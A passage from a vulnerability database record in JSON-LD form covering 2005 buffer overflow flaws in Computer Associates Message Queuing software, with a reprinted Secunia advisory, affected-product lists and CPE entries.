"url": "http://secunia.com/product/5585/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5580/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5595/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5587/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5594/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5591/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5583/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5576/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1682/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5577/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5590/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_vacancies/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3206/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5596/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2622/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5588/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5578/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5573/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5579/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5589/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5593/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5592/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5597/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13878"
},
{
"db": "BID",
"id": "14623"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "NVD",
"id": "CVE-2005-2669"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13878"
},
{
"db": "BID",
"id": "14623"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "NVD",
"id": "CVE-2005-2669"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-08-23T00:00:00",
"db": "CERT/CC",
"id": "VU#619988"
},
{
"date": "2005-08-23T00:00:00",
"db": "VULHUB",
"id": "VHN-13878"
},
{
"date": "2005-08-22T00:00:00",
"db": "BID",
"id": "14623"
},
{
"date": "2005-08-23T23:30:33",
"db": "PACKETSTORM",
"id": "39503"
},
{
"date": "2005-08-23T04:00:00",
"db": "NVD",
"id": "CVE-2005-2669"
},
{
"date": "2005-08-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-10-21T00:00:00",
"db": "CERT/CC",
"id": "VU#619988"
},
{
"date": "2017-11-21T00:00:00",
"db": "VULHUB",
"id": "VHN-13878"
},
{
"date": "2009-07-12T17:06:00",
"db": "BID",
"id": "14623"
},
{
"date": "2021-04-14T15:46:28.003000",
"db": "NVD",
"id": "CVE-2005-2669"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates Message Queuing software vulnerable to buffer overflows",
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
],
"trust": 0.6
}
}
VAR-200508-0051
Vulnerability from variot - Updated: 2023-12-18 12:53Multiple buffer overflows in Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allow remote attackers to execute arbitrary code via unknown vectors. This may allow an attacker to escalate their privileges to SYSTEM level. CA Unicenter Management Portal provides access to enterprise management information and various Unicenter management solutions such as personalized WEB interface.
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/
TITLE: CA Various Products Message Queuing Vulnerabilities
SECUNIA ADVISORY ID: SA16513
VERIFY ADVISORY: http://secunia.com/advisories/16513/
CRITICAL: Moderately critical
IMPACT: Spoofing, DoS, System access
WHERE:
From local network
SOFTWARE: CA Unicenter TNG 2.x http://secunia.com/product/3206/ CA Unicenter Software Delivery 4.x http://secunia.com/product/5597/ CA Unicenter Software Delivery 3.x http://secunia.com/product/5596/ CA Unicenter Service Level Management 3.x http://secunia.com/product/5595/ CA Unicenter Remote Control 6.x http://secunia.com/product/2622/ CA Unicenter Performance Management for OpenVMS 2.x http://secunia.com/product/5573/ CA Unicenter Network and Systems Management (NSM) Wireless Network Management Option 3.x http://secunia.com/product/5594/ CA Unicenter Network and Systems Management (NSM) 3.x http://secunia.com/product/1683/ CA Unicenter Management for WebSphere MQ 3.x http://secunia.com/product/5590/ CA Unicenter Management for Web Servers 5.x http://secunia.com/product/5593/ CA Unicenter Management for Microsoft Exchange 4.x http://secunia.com/product/5591/ CA Unicenter Management for Lotus Notes/Domino 4.x http://secunia.com/product/5592/ CA Unicenter Jasmine 3.x http://secunia.com/product/5589/ CA Unicenter Enterprise Job Manager 1.x http://secunia.com/product/5588/ CA Unicenter Data Transport Option 2.x http://secunia.com/product/5587/ CA Unicenter Asset Management 4.x http://secunia.com/product/1682/ CA Unicenter Asset Management 3.x http://secunia.com/product/5586/ CA Unicenter Application Performance Monitor 3.x http://secunia.com/product/5585/ CA eTrust Admin 8.x http://secunia.com/product/5584/ CA eTrust Admin 2.x http://secunia.com/product/5583/ CA CleverPath Predictive Analysis Server 3.x http://secunia.com/product/5581/ CA CleverPath Predictive Analysis Server 2.x http://secunia.com/product/5580/ CA CleverPath OLAP 5.x http://secunia.com/product/5578/ CA CleverPath Enterprise Content Manager (ECM) 3.x http://secunia.com/product/5579/ CA CleverPath Aion 10.x http://secunia.com/product/5582/ CA BrightStor SAN Manager 11.x http://secunia.com/product/5576/ CA BrightStor SAN Manager 1.x http://secunia.com/product/5575/ CA BrightStor Portal 11.x http://secunia.com/product/5577/ CA Advantage Data Transport 3.x http://secunia.com/product/5574/
DESCRIPTION: Some vulnerabilities have been reported in various products within the CA Message Queuing (CAM / CAFT) software, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.
1) An unspecified error in the CAM service can be exploited to cause a DoS by sending specially crafted packets to the TCP port.
2) Unspecified boundary errors can be exploited to cause buffer overflows by sending specially crafted packets to the service.
3) An error can be exploited to spoof CAFT and execute arbitrary commands with escalated privileges.
The vulnerabilities affect all versions of the CA Message Queuing software prior to versions 1.07 Build 220_13 and 1.11 Build 29_13.
SOLUTION: Apply patches (see vendor advisory for details).
PROVIDED AND/OR DISCOVERED BY: Reported by vendor.
ORIGINAL ADVISORY: Computer Associates: http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200508-0051",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "2.2"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "4.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.7"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter management portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.2"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.1"
},
{
"model": "cleverpath olap",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "5.1"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter remote control",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "cleverpath aion",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.0"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter data transport option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.7"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.5"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.4"
},
{
"model": "unicenter management portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.1"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "advantage data transport",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.11"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.1"
},
{
"model": "unicenter performance management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.2"
},
{
"model": "unicenter enterprise job manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter nsm wireless network management option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "brightstor portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4.2"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.2"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.9"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0.1"
},
{
"model": "adviseit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "cleverpath ecm",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "unicenter jasmine",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "computer associates",
"version": null
},
{
"model": "message queuing",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "1.05"
},
{
"model": "message queuing",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "1.07 build 220_13 before"
},
{
"model": "message queuing",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "1.11 build 29_13 before"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4.2"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.1"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.1"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter remote control sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter performance management for openvms sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates unicenter nsm wireless network management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates unicenter management for websphere mq",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0.1"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.1"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter management for lotus notes/domino",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter jasmine",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter enterprise job manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter data transport option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.9"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.7"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates cleverpath olap",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.1"
},
{
"model": "associates cleverpath ecm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates cleverpath aion",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.0"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.11"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.07"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.05"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor san manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor san manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates adviseit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates advantage data transport",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cam build 29 13",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.11"
},
{
"model": "associates cam build 220 13",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.07"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "BID",
"id": "14622"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000834"
},
{
"db": "NVD",
"id": "CVE-2005-2668"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-250"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:advantage_data_transport:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:adviseit:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_portal:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_admin:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_admin:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:messaging:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:messaging:1.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_jasmine:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:3.5:*:websphere_mq:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:4.0:*:lotus_notes_domino:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:4.0:*:microsoft_exchange:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:1.1:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_application_performance_monitor:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_asset_management:4.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_enterprise_job_manager:1.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:5.0:*:web_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_management_portal:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_remote_control:6.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.1:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
